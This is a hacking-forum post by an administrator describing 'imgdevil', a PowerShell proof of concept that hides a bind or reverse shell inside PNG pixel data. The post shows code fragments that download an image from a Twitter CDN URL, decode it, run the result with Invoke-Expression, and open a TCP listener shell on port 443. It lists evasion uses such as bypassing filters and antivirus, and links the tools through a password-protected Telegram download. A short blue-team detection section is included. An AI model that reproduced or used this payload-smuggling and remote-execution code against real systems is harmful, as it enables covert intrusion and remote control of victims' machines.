dEEpEst
☣☣ In The Depths ☣☣
Staff member
Administrator
Super Moderator
Hacker
Specter
Crawler
Shadow
- Joined
- Mar 29, 2018
- Messages
- 13,861
- Solutions
- 4
- Reputation
- 27
- Reaction score
- 45,549
- Points
- 1,813
- Credits
- 55,350
7 Years of Service
56%
PoC: Hiding PowerShell Shells Inside PNG Files – imgdevil 
What is imgdevil?imgdevil is a proof-of-concept script that demonstrates how a shell payload can be encoded into the pixel data of a PNG image and later extracted and executed using PowerShell.
Developed by @nyxgeek (TrustedSec) Payload hides inside the Red channel of each pixel The Alpha channel is used as a terminator marker (R=42, A=42) Fully PowerShell-based (encoder and decoder in .ps1)
Encoding Process – imgdevil.ps1To encode a shell into an image:
1. Modify these lines:
Code:
$originalimagepath = "C:\Path\to\clean_image.png"
$inputpowershellpath = "C:\Path\to\bindshell_one-liner.ps1"2. The script:
- Loads the image using
System.Drawing.Bitmap- Replaces pixel red values with ASCII chars from your shell script
- Appends a terminator pixel:
[A=42, R=42]- Saves the image as
imagedevil_output-500.png
Result: A normal-looking image that contains a fully functional reverse or bind shell.
Decoding & Execution –
Code:
imgdevil_decoder_only.ps1[/ICODE][/B][/SIZE]
Decoder downloads the PNG image and extracts the hidden PowerShell commands:
[CODE=powershell]
$webpath = "https://pbs.twimg.com/media/DUUb7yQVQAEGZDp.png"
...
invoke-expression "$(readIMGDevil)"This version includes an
Invoke-Expression, meaning it executes immediately after decoding.
WARNING: This will create a shell connection.🛠 Example Bind Shell Payload –
bindshell_one-liner.ps1The payload listener:
Code:
$listener = [System.Net.Sockets.TcpListener]443; ...Sets up a socket listener that reads commands, executes them, and sends results back – all over TCP port 443. This script is encoded byte-by-byte into an image file.
Red Team Use Cases Bypass filters that block .ps1 or .bat downloads Evade static analysis and signature-based AV Hide payloads in social media-hosted images (e.g. Twitter CDN)
Blue Team Notes
Any image processing tool that checks only image headers or file hashes won't detect this.
Look for abnormal alpha/red pixel values (e.g. consistent ASCII patterns).
Implement pixel-level anomaly detection or analyze System.Drawing.Bitmap object creation in PowerShell scripts. Try It Yourself (In a Lab!)1. Prepare a PowerShell one-liner (e.g. bind shell).
2. Choose a clean image ([/
ICODE].png[/ICODE]).
3. Encode using
imgdevil.ps1.4. Upload image online or serve it via HTTP.
5. Use
imgdevil_decoder_only.ps1 to extract and run it.
More Info
imgdevil.ps1 and imgdevil_decoder_only.ps1 are included in the original repo.
Original blog post was published by TrustedSec.
Download repository:
Code:
File saved with ID: 5d1040392945460cb374ae7c968e7c96
Download link: https://t.me/lvl23htANONFILE_bot?start=download_5d1040392945460cb374ae7c968e7c96
Password: htdark.com
What do you think? Have you used similar techniques or seen them in the wild?
Share your thoughts, improvements, or detection strategies below. Let’s push the boundaries of research together.